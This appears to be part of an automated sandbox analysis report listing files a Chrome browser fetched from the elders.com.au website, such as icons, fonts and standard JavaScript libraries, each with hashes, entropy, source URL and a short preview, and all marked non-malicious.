                                                                                                                                                                                                            SSDEEP:48:9Ra4knA9WIrCcOzZt091Anz3rDc3HKy309RJHdjEeSyL3dXXdbP1riiP4GhTeNb:93knmWIrCzZWnBHKj3JHdjv3d9bEixTI
                                                                                                                                                                                                            MD5:ED1B1A7DDF5060212D592E5105F8B197
                                                                                                                                                                                                            SHA1:460355D491FDEAF93A6549B40EB426B9E27D9F1D
                                                                                                                                                                                                            SHA-256:564DEFC382B32EDEC8C768509535C12EE88121B419D5B16C07F281DE92FA6599
                                                                                                                                                                                                            SHA-512:09394873ADF78A8A483D0EF582EE567476271C9125C0C77B12D693A5C831D72746796DA41B257113FF9FE6A49F010520C6B8B04F40EA7D0382FA1888F8623C99
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                            URL:https://elders.com.au/content/dam/eld/icons---logos/icons/teamwork-icon.png
                                                                                                                                                                                                            Preview:.PNG........IHDR..............l}.....pHYs..2...2..(dZ.....iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.0-c000 137.da4a7e5, 2022/11/27-09:35:03 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmp:CreatorTool="Adobe Photoshop 24.1 (Windows)" xmp:CreateDate="2023-01-27T17:24:54+10:30" xmp:ModifyDate="2023-01-27T17:36:46+10:30" xmp:MetadataDate="2023-01-27T17:36:46+10:30" dc:format="image/png" photoshop:ColorMode="3" xmpMM:InstanceID="xmp.iid:965dcbe0-aadc-a34e-840f-84c2126aec49" xmpMM:DocumentID="adobe:docid:photoshop:1149732c-1da8-364c-90fb-7ef8f325988c" xmpMM:OriginalDocumentID="xmp.did:bcbcf
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:PNG image data, 384 x 384, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                            Size (bytes):12378
                                                                                                                                                                                                            Entropy (8bit):7.909076338338389
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:Muvw/P18FkjHOnr8TLhMOEJRm4Z4NBSQoeydWcKFkj:M7d82jHOnrkSzJRuNIReywF4
                                                                                                                                                                                                            MD5:1D137F6E42BD3F8A9482EAFB0C92D735
                                                                                                                                                                                                            SHA1:2A06B145558B7DB2502F7DB1FF0DBEA57E8F92E0
                                                                                                                                                                                                            SHA-256:448CA01DBDB41B4957CFF33D67FB0743EE954D78ACA68670F08851096626A95F
                                                                                                                                                                                                            SHA-512:9FA0FB01BDC3BA93D6D67292F8174CE7647F318105BC39B53829087C105661C286A304125A52800DAC6F88EC80686777FFDBEEDF8FF17610C46E51506FE144C6
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                            URL:https://upload.wikimedia.org/wikipedia/commons/thumb/4/42/Adobe_Acrobat_DC_logo_2020.svg/384px-Adobe_Acrobat_DC_logo_2020.svg.png
                                                                                                                                                                                                            Preview:.PNG........IHDR....................gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD..............tIME.....)4*6.p../^IDATx...w..U.....I..{i...".."E.....kA]{.E..W...Z.w.U,....*..H....d...H......y|TH2.sN..9...C..U...9.34p..,....T.R....@Y.."........Z...V.....h`q0.wf....!LV...T....K...5....x..RZj,..oq..(.d..-..t(...+..s.i,=.#v...$B..j....F.5... iE..G[..X..jjL.H....g...z...)..`{%...K..../"ixp..x.Z^.........)....\.t&....l..F[.Sy.........*s...F.O"........".....0T@_,w..5vD$K.....^H. H..(........H.[b..2..R.......)..46D$G...?o.3r2.lm..o..c.;..x......\...O..e)..P....e.......pqp._'{.NR..!PT...2J._D....2....,.e..`{>...Ht......).8.\!K.f......|../".WG.0%T..Y...|n....U."".T..>..sk.7..S@...|...P......B.H."s...[.J......DD.2".G....i......e.p..MD..S..=.&.m.....|..........G...5i.....!.Q.>"".23h.f6.....W@.&.B.>S...I..B..mu*.E.X...3.CG...H.+...a.... ...}DD..@.P>/.4.B..~./"....{.X.....s.....~..I....ldh..`[.u].T..._D$..E..., ..) .y.e....HZ...{..R8..(..^.sO
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:ASCII text, with very long lines (2345)
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):200761
                                                                                                                                                                                                            Entropy (8bit):5.5291756112511905
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3072:QPwizDGLETrtIA0f5yptcY0/H8+bEQDmKD0C8rT/Xy:qGLgrtyYjWx0C8rT/i
                                                                                                                                                                                                            MD5:58075333D87B4A55CE9928D20EBF5633
                                                                                                                                                                                                            SHA1:D4316FAA9E8DE4B3256B749FD1D6E64F7537D525
                                                                                                                                                                                                            SHA-256:1BA8105E2C84721D08359945D7E23F136E8760617F0DEB36F7DCE7D6125E5A7E
                                                                                                                                                                                                            SHA-512:FC0FBF785DA216F2BBAD26F1531A33DA43229C62C3EB9E687B77047CF90DD89D406F93C4CCA77EFF4344FF3BD0D3F4993B1A249EC9615C50E2742C1549F96508
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                            Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"4",. . "macros":[{"function":"__e"},{"function":"__u","vtp_component":"URL","vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"function":"__u","vtp_component":"HOST","vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"function":"__u","vtp_component":"PATH","vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"function":"__f","vtp_component":"URL"},{"function":"__e"}],. "tags":[{"function":"__mf","metadata":["map"],"once_per_event":true,"vtp_projectId":"b953cf15-e568-418d-a9cb-1ea0cf6357a5","tag_id":4}],. "predicates":[{"function":"_eq","arg0":["macro",0],"arg1":"gtm.js"}],. "rules":[[["if",0],["add",0]]].},."runtime":[ [50,"__e",[46,"a"],[36,[13,[41,"$0"],[3,"$0",["require","internal.getEventData"]],["$0","event"]]]]. ,[50,"__mf",[46,"a"],[41,"h"],[52,"b",["require","createQueue"]],[52,"c",["require","inj
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                            Size (bytes):5538
                                                                                                                                                                                                            Entropy (8bit):4.855074843571827
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:9J4o/vHtcZfoRUGSA8a32BtT3lh2toLZU6KJyaz8G0Y:T1vHsfoRfSA8y2B93lh2toLZV+yaz2Y
                                                                                                                                                                                                            MD5:6ECA9F97D2E4B34F7B8C85B49887C474
                                                                                                                                                                                                            SHA1:3155098A09A2D8BAE294A044C3D82452BDDC6CBC
                                                                                                                                                                                                            SHA-256:A5C392E142DD1D80325021AD4497F87E97372DA8819D04C63EB09132D8C0EE25
                                                                                                                                                                                                            SHA-512:A86FFEFF1FF65DF109EA2CA6098B533D8D6F4BCD98A7604E247E93EDE7161B903D9B52C05F460F061E99D4573CCEC36AF94618A2BC0BAA4F7B7F2D4227FF0F55
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                            URL:https://elders.com.au/.rum/@adobe/helix-rum-js@%5E2/dist/rum-standalone.js
                                                                                                                                                                                                            Preview:/*. * Copyright 2024 Adobe. All rights reserved.. * This file is licensed to you under the Apache License, Version 2.0 (the "License");. * you may not use this file except in compliance with the License. You may obtain a copy. * of the License at http://www.apache.org/licenses/LICENSE-2.0. *. * Unless required by applicable law or agreed to in writing, software distributed under. * the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR REPRESENTATIONS. * OF ANY KIND, either express or implied. See the License for the specific language. * governing permissions and limitations under the License.. */..// /* eslint-disable max-classes-per-file */.(function () {. 'use strict';.. /* eslint-env browser */. function sampleRUM(checkpoint, data) {. // eslint-disable-next-line max-len. const timeShift = () => (window.performance ? window.performance.now() : Date.now() - window.hlx.rum.firstReadTime);. try {. window.hlx = window.hlx || {};. sampleRUM.enhance =
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:ASCII text, with very long lines (760)
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):101682
                                                                                                                                                                                                            Entropy (8bit):5.4801097429116385
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3072:uyefSIz4emwRsSragavOIYdD3ise8Ux+rHi:uPfTz4emSD3o8Ux+rHi
                                                                                                                                                                                                            MD5:F9E8E8C279BAF6A1A278042AFE4F395A
                                                                                                                                                                                                            SHA1:D2631D76F948170994789F4C449098EF8A1160AE
                                                                                                                                                                                                            SHA-256:AC9C69C1F6DF29993331F7E3F9B7EC6D343575D60F4A5795456422E33BCF15D2
                                                                                                                                                                                                            SHA-512:24DA116ACBB4BCCE90B5DB29BAD1B65E84401E97358194A688C75ABC3AB34D4AEB4A2F918A3E15B42BB715FA160827A06FEBC33E8C382BA8058DB58DF3A159D5
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                            Preview:/*. jQuery JavaScript Library v1.12.4-aem. http://jquery.com/.. Includes Sizzle.js. http://sizzlejs.com/.. Copyright jQuery Foundation and other contributors. Released under the MIT license. http://jquery.org/license.. Date: 2016-05-20T17:17Z. Sizzle CSS Selector Engine v2.2.1. http://sizzlejs.com/.. Copyright jQuery Foundation and other contributors. Released under the MIT license. http://jquery.org/license.. Date: 2015-10-17. jQuery requestAnimationFrame - 0.2.2 - 2016-10-26. https://github.com/gnarf37/jquery-requestAnimationFrame. Copyright (c) 2016 Corey Frang; Licensed MIT */.(function(y,na){"object"===typeof module&&"object"===typeof module.exports?module.exports=y.document?na(y,!0):function(ja){if(!ja.document)throw Error("jQuery requires a window with a document");return na(ja)}:na(y)})("undefined"!==typeof window?window:this,function(y,na){function ja(a){var b=!!a&&"length"in a&&a.length,d=c.type(a);return"function"===d||c.isWindow(a)?!1:"array"===d||0===b||"number"===typeof b
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:ASCII text, with very long lines (32730)
                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                            Size (bytes):430018
                                                                                                                                                                                                            Entropy (8bit):5.371844747679136
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12288:751zU/u3sgauHSp0H/G3KFVbHvbQncHPGXj:jcucgauHSpnKFVbHvbQncHPO
                                                                                                                                                                                                            MD5:877956833EDC7A947734722C9A3BBB84
                                                                                                                                                                                                            SHA1:D2703300A2084FBCF3D596FBCC0C4A6007AD2BA3
                                                                                                                                                                                                            SHA-256:34BAB527C6284CA8AD76C206BD6BDCE43E7A587652A544F7D673542B266B1CFC
                                                                                                                                                                                                            SHA-512:4DF7ED6845552642CB79F956278150FFD71DBB85E8558919DC3144C6CEEE569DCADEA9BBD93719FC21697622FCF4741E63EACD696A6A7737BB2CC79B7B08CA5D
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                            URL:https://assets.adobedtm.com/728d44811931/14db0b582053/launch-f5e74cc94fc9.min.js
                                                                                                                                                                                                            Preview:// For license information, see `https://assets.adobedtm.com/728d44811931/14db0b582053/launch-f5e74cc94fc9.js`..window._satellite=window._satellite||{},window._satellite.container={buildInfo:{minified:!0,buildDate:"2024-08-29T04:29:57Z",turbineBuildDate:"2024-08-22T17:32:44Z",turbineVersion:"28.0.0"},environment:{id:"EN4406273eae824fa9a4a08164ecb82367",stage:"production"},dataElements:{"Interaction Link (custom)":{forceLowerCase:!0,cleanText:!0,modulePath:"core/src/lib/dataElements/customCode.js",settings:{source:function(e){if(e&&e.component&&e.component.hasOwnProperty("interactionLink"))return e.component.interactionLink}}},"DOM | Link URL":{cleanText:!0,modulePath:"core/src/lib/dataElements/domAttribute.js",settings:{elementProperty:"href",elementSelector:"#container-5cd4c0bcf1 > div > div > div > div.header--container.has-utility > div.header--utility-container > ul > li:nth-child(1) > a"}},"ACDL | branchName":{cleanText:!0,modulePath:"core/src/lib/dataElements/customCode.js",setti
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):72130
                                                                                                                                                                                                            Entropy (8bit):5.606238239604008
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:bfu0/93VQ/kdM5WoSwQCV7nh7lI2ibrrc6uFYk/xIDJCOqmqM1AmLMF4Ld2wPECS:Tu0/93QWFZyptL
                                                                                                                                                                                                            MD5:91D20120E7FE55850F031200600F53AE
                                                                                                                                                                                                            SHA1:93E3313248FF84E43025EB243AE964AF730A0BC3
                                                                                                                                                                                                            SHA-256:9F46BB6E66AFE1B40CC7E1FB7DE4A38E5D6FB27C4BDA7B986B0469817055A299
                                                                                                                                                                                                            SHA-512:7E2219E7438984160733B0B01711373596C4D483AFA78742BC21D24EF71D051F0B72B97BCEB37DBC976907797B6E900241ECD2D01EEA61BD2C7FFCCABC256325
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                            Preview:var mouseflowDisableKeyLogging = true;if(typeof mouseflow==='undefined'&&typeof mouseflowPlayback==='undefined'){(function(){var _204=false;var _193=false;var _200=[];var _196=[];var _20='https://us.mouseflow.com';function _7(_341,_151){_151=(typeof _151!=='undefined'?_151:'');if(_4.debug)console.log('MF'+(_4.includeDebugTime?' - '+_151:'')+': '+_341)}var _60=new _397(window);var _34=new _376(window);var _5=new _383(window,Math,JSON,_60);var _13=new _372(_60,_5);var _36=new _285('local',window,_5,_7);var _304=new _285('session',window,_5,_7);var _276=new _336(window);var _4=new _359(window,_36,_204,_193);_4._100();_4._208=[];_4._174=[];_4._117=[];_4._173=[];_4._419=[];_4._418=[];_4._71='b953cf15-e568-418d-a9cb-1ea0cf6357a5';_4._417=true;_4._416=false;_4._415='5242000';_4._161('appUrl',_20);var _295=new _342(window,_5,_4,_7);function _305(_0,_4,_53,_5,_13,_76,_36){var _20,_71,_7,_56;var _194='mf_liveHeatmaps';var _15;var _119=[];var _89;var _137=false;function _46(_164,_122,_176,_112){_
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:Unicode text, UTF-8 text, with very long lines (65472)
                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                            Size (bytes):151775
                                                                                                                                                                                                            Entropy (8bit):5.310612558975077
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3072:7RwVezu8jPgro1A29AaiWqSrdNgKTPhB/B1pLD:7RwsuuPgroSEBiNSR7B/R
                                                                                                                                                                                                            MD5:46A2DF1A9BFAEEFFBD5B53738ED986E6
                                                                                                                                                                                                            SHA1:D60EA1E3103A34CD5AB43950A9559F2DE478F769
                                                                                                                                                                                                            SHA-256:90A2617361565EFD206F9AAD7188BB03F52B7CE94143CA44E51C5F85C861D384
                                                                                                                                                                                                            SHA-512:52F105577E6A6D7128A270B81C6520DF57A181C36938DEA5BCBF4A93D6CFF832BBFD468C9D9A9847271ACA4AB4FD2ACF6D779B05C90F10342176B9EF33A3AC2D
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                            URL:https://elders.com.au/etc.clientlibs/el/clientlibs/clientlib-site.lc-46a2df1a9bfaeeffbd5b53738ed986e6-lc.min.js
                                                                                                                                                                                                            Preview:/*! For license information please see site.js.LICENSE.txt */.!function(){var e={616:function(e,t){var n;!function(t,n){"use strict";"object"==typeof e.exports?e.exports=t.document?n(t,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return n(e)}:n(t)}("undefined"!=typeof window?window:this,(function(r,o){"use strict";var i=[],a=Object.getPrototypeOf,s=i.slice,l=i.flat?function(e){return i.flat.call(e)}:function(e){return i.concat.apply([],e)},c=i.push,u=i.indexOf,d={},p=d.toString,f=d.hasOwnProperty,h=f.toString,m=h.call(Object),g={},v=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},y=function(e){return null!=e&&e===e.window},b=r.document,w={type:!0,src:!0,nonce:!0,noModule:!0};function x(e,t,n){var r,o,i=(n=n||b).createElement("script");if(i.text=e,t)for(r in w)(o=t[r]||t.getAttribute&&t.getAttribute(r))&&i.setAttribute(r,o);n.head.appendChild(i).parentNode.removeChild(i)}function L(e){return nu
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:TrueType Font data, 15 tables, 1st "FFTM", 44 names, Macintosh
                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                            Size (bytes):221644
                                                                                                                                                                                                            Entropy (8bit):5.50717267650127
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3072:T2c9voG1Y1101457Im/wefpzxny+2f9YLcpzlIZF0BfB4M:MG8q1457FTpdny+mHIZF0lN
                                                                                                                                                                                                            MD5:049592BE7C0484EA3BD978616A1CF3C4
                                                                                                                                                                                                            SHA1:94970D5D4FD1F696D09E2C105EB4E7A8F2ADA576
                                                                                                                                                                                                            SHA-256:2CD32007EAF913C0286165205B98488D17E7B61242925B4FD4D2694CDB23AD49
                                                                                                                                                                                                            SHA-512:0502F3727BAAD8602087D48F11B87171960C4530D1BE64818509F1787C027DBDDEDB50E40AE458E304798384E0BDE6E9088727103E3ABC91E3E7A23EF0C8482F
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                            URL:https://elders.com.au/etc.clientlibs/el/clientlibs/clientlib-react/resources/static/media/Meta-Pro-Medium.afe5599c.ttf
                                                                                                                                                                                                            Preview:...........pFFTM..D...a.....GDEF).-...!....fGPOS.g...B.....GSUB.|.>..!t..!lOS/2.Sq....x...`cmap............gasp......!.....glyf)w....#.....head..J........6hhea...j...4...$hmtx.u.........locau1.........`maxp.......X... name.h....... =post.H........,.........8*\._.<...................d[.=.....a.........................=...............................................@.........&.........c.......c.....W..................P. {........MONO..............." .............. ...,.B.....M...........(.K...K.6.#.M.-.L.#...7...K.9.7.:.......b.7.$.7.I.7...A...7.<.7...-.1.7...#.!.#...7.J.<...#.U.7.;.7.1.K.C.K.z.....7.y.-...-...7.K...c.U.A.7.w.U...U...U...7.|.U. .U.%...E.U...U.:.A...U...7.5.U...7.G.U.U.2.......P.8...:...&.........-.+.U.....+...b.7.....D.#...2.7.H...7.5.7...7.=.&.".-.>.K...E.......J...K.(.C.,.B.#.2.5.K.5.7.^.C...(.U...(.P...................(.f.....U.f...6.7.....'.K...7.P.-.....8.....U.2.-...7.R.7...(...#...7.I.7.R.7.c.....#...7...-.}.-.D.#.'.P._.#...A.(.7.P.-...(...#...-...-...-...A.K..
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:ASCII text, with very long lines (61608)
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):61893
                                                                                                                                                                                                            Entropy (8bit):5.140561960215685
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:NsO4MAvAcCfFvM6aPMPv3Mo8ExbxHTVCLXMrJ3u6byVm7MT2NIbjyixM3XpZWVe8:NDaWkNo9s3Ccd
                                                                                                                                                                                                            MD5:FC0AE1E61D12D522D67E845F4BDEBDF4
                                                                                                                                                                                                            SHA1:961BA292AC8C68C7383956C7CBCD929CAF64BD24
                                                                                                                                                                                                            SHA-256:1BBDB19132CECE5103C0A2919E09320EDC6687AB3879FC3BB1D28F0F0FA5D45F
                                                                                                                                                                                                            SHA-512:9A9DD578CA6E14A6E0C66FD731453841051C257E0065F5797AC817EF6250AFB1FBCD6BAC57A94B3F54BBF306675F6CFD770BF2C22975547907640A9F18E5BB37
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                            Preview:/*!. * Bootstrap v5.0.0-beta3 (https://getbootstrap.com/). * Copyright 2011-2021 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors). * Licensed under MIT (https://github.com/twbs/bootstrap/blob/main/LICENSE). */.!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?module.exports=e(require("@popperjs/core")):"function"==typeof define&&define.amd?define(["@popperjs/core"],e):(t="undefined"!=typeof globalThis?globalThis:t||self).bootstrap=e(t.Popper)}(this,(function(t){"use strict";function e(t){if(t&&t.__esModule)return t;var e=Object.create(null);return t&&Object.keys(t).forEach((function(s){if("default"!==s){var i=Object.getOwnPropertyDescriptor(t,s);Object.defineProperty(e,s,i.get?i:{enumerable:!0,get:function(){return t[s]}})}})),e.default=t,Object.freeze(e)}var s=e(t);const i=t=>{do{t+=Math.floor(1e6*Math.random())}while(document.getElementById(t));return t},n=t=>{let e=t.getAttribute("data-bs-target");if(!e||"#"===e){let s=t.getAttribut
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                            Size (bytes):291981
                                                                                                                                                                                                            Entropy (8bit):5.1014349996806985
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3072:LYUdwzo64+dguiv6jk5zb5Dp1p3vAKK8kOk9UTX261IK:LYUdwzo64+du6jk5z1Dp1eVOLT71IK
                                                                                                                                                                                                            MD5:E592021EAFD59DE123415AB937A09F08
                                                                                                                                                                                                            SHA1:95C6AA47BA749A69830B1D3918303835654F4D75
                                                                                                                                                                                                            SHA-256:9ADC4D1EFBC0737998D624B6168CF38F1A241E3D22898942C9C3654C460419CD
                                                                                                                                                                                                            SHA-512:A3128F9AEE8B298500A85C4AA6FF24CAEC11A6AE15A84F4E2B0A9BE999B4B5640DBE2B02696EDD485437ADE448BF4BD3E22980E1DD2C2B34C6587327A6D1EDFA
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                            URL:https://elders.com.au/etc.clientlibs/el/clientlibs/clientlib-base.lc-e592021eafd59de123415ab937a09f08-lc.min.js
                                                                                                                                                                                                            Preview:/*******************************************************************************. * Copyright 2019 Adobe. *. * Licensed under the Apache License, Version 2.0 (the "License");. * you may not use this file except in compliance with the License.. * You may obtain a copy of the License at. *. * http://www.apache.org/licenses/LICENSE2.0. *. * Unless required by applicable law or agreed to in writing, software. * distributed under the License is distributed on an "AS IS" BASIS,. * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.. * See the License for the specific language governing permissions and. * limitations under the License.. ******************************************************************************/../**. * Element.matches(). * https://developer.mozilla.org/enUS/docs/Web/API/Element/matches#Polyfill. */.if (!Element.prototype.matches) {. Element.prototype.matches = Element.prototype.msMatchesSelector || Element.prototype.webkitMatchesSelector;.}..//
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                            Size (bytes):16
                                                                                                                                                                                                            Entropy (8bit):3.625
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:UU:UU
                                                                                                                                                                                                            MD5:DD9B395C741CE2784096E26619E14910
                                                                                                                                                                                                            SHA1:D691792F378240F80919BEDA895262C509D22B75
                                                                                                                                                                                                            SHA-256:C084B47104C493FB377B6D35D8C08DF67D773F6DCF8294C0A7360710CD8CACBD
                                                                                                                                                                                                            SHA-512:BB9D8EFF819A61A9CE8BDF03336D6E0650DC5F0339843CAD9C8B96C404CA751FB797BECD4D9A1FD24AFD9D6F3FA9B86645E6E8AD8B855C032E80A4F8897B983C
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                            URL:https://elders.com.au/etc.clientlibs/foundation/clientlibs/jquery.lc-dd9b395c741ce2784096e26619e14910-lc.min.js
                                                                                                                                                                                                            Preview:window.$CQ=_g.$;
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                            Size (bytes):16
                                                                                                                                                                                                            Entropy (8bit):3.75
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:H0hCkY:UUkY
                                                                                                                                                                                                            MD5:AFB69DF47958EB78B4E941270772BD6A
                                                                                                                                                                                                            SHA1:D9FE9A625E906FF25C1F165E7872B1D9C731E78E
                                                                                                                                                                                                            SHA-256:874809FB1235F80831B706B9E9B903D80BD5662D036B7712CC76F8C684118878
                                                                                                                                                                                                            SHA-512:FD92B98859FFCCFD12AD57830887259F03C7396DA6569C0629B64604CD964E0DF15D695F1A770D2E7F8DF238140F0E6DA7E7D176B54E31C3BB75DDE9B9127C45
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                            URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISEAkG5Q0HWZ-FdxIFDVNaR8U=?alt=proto
                                                                                                                                                                                                            Preview:CgkKBw1TWkfFGgA=
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:TrueType Font data, 15 tables, 1st "FFTM", 46 names, Macintosh
                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                            Size (bytes):219800
                                                                                                                                                                                                            Entropy (8bit):5.594013634964155
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3072:25HZHppYd1XyU2tUojj5jre+DX/tw9Y8NJ/W+0B7qtM:YHZHb8yU2tBDWpNJ/W+0xiM
                                                                                                                                                                                                            MD5:6A4BC039701FB94CD04C2851DEE47406
                                                                                                                                                                                                            SHA1:E770B3D29981923C54BDD5105F0BFD55029DDF74
                                                                                                                                                                                                            SHA-256:4E2F12DFCFB031A51353882E646D68D42B5D3CFB252BD9383DAFF9B924B46CE1
                                                                                                                                                                                                            SHA-512:19FEFCB40D28DC2B6CAEEC9F1B52C0574A4B0644E821BFC9EC0EDB88F18BDC6EA0A9B55E670783E7BCE107BDC1FCC617644FBC84CE70525F19BE5D2E4908F284
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                            URL:https://elders.com.au/etc.clientlibs/el/clientlibs/clientlib-react/resources/static/media/Meta-Pro-Bold.cebc7f85.ttf
                                                                                                                                                                                                            Preview:...........pFFTM.>.M..Z|....GDEF.%..........GPOS.SO...P.....GSUBz.g.......!.OS/2..s<...x...`cmap.F*G.......jgasp............glyfT....#....$head..K........6hhea...~...4...$hmtx:4./........loca...6.......nmaxp...p...X... name......... .post.r.....0..,c.........5.._.<...................dO.,.....i.........................,.............................m.................@.........).........`.......`.....g..................P. {........MONO..............." .............. ...*.9.....M...........1.F...F.<.#.R.#.R.#...-...F.B.-.@.......~.-.&.-.J.-...7...-.5.-.....6.-.$.#.......-.I.2.....].-.;.-.0.A.D.A.....~.-...-...(...-.P...b.K.>.-.t.K...K...K...-.w.K.(.K.)...V.K...K.<.7.y.K...-.@.K...-.R.K.R.#.......I.?...J...<... .....#.6.K.....6...^.2.....O.#...(.2.>...-./.-...-.:...3.#.?.A...<.......B.#.D.#.8.*.9...(.2.C.1.-.e.8....._...".F...................#.......K.....2.2.....1.F...-.Q.-.....8.....K.V.-...7.B.-...#.(.....-.J.-.B.-.l.....#...-...#.x.#.O.#.".F.Z.....-.2.7.D.#...#.(.....#...#...#...<.P..
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 600x400, components 3
                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                            Size (bytes):172833
                                                                                                                                                                                                            Entropy (8bit):7.97941391640036
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3072:a+NHthlh12DD+/mmNTIbIhZjNf00ex5+zFwvTn7Q+SfjcwkUm6Ffdcykv:nNHtnh12DDsmpM/FwbuWw9jVkUm6Ufv
                                                                                                                                                                                                            MD5:BE3E5050811DEE216A7A83BED23ADA95
                                                                                                                                                                                                            SHA1:719F99304500468A81FDE12CFB628D6B8B44D974
                                                                                                                                                                                                            SHA-256:9EAF65CC1B0686F3C964D07DE135E84A7AAF1A46F0EBEDB4000F5A28722D54AA
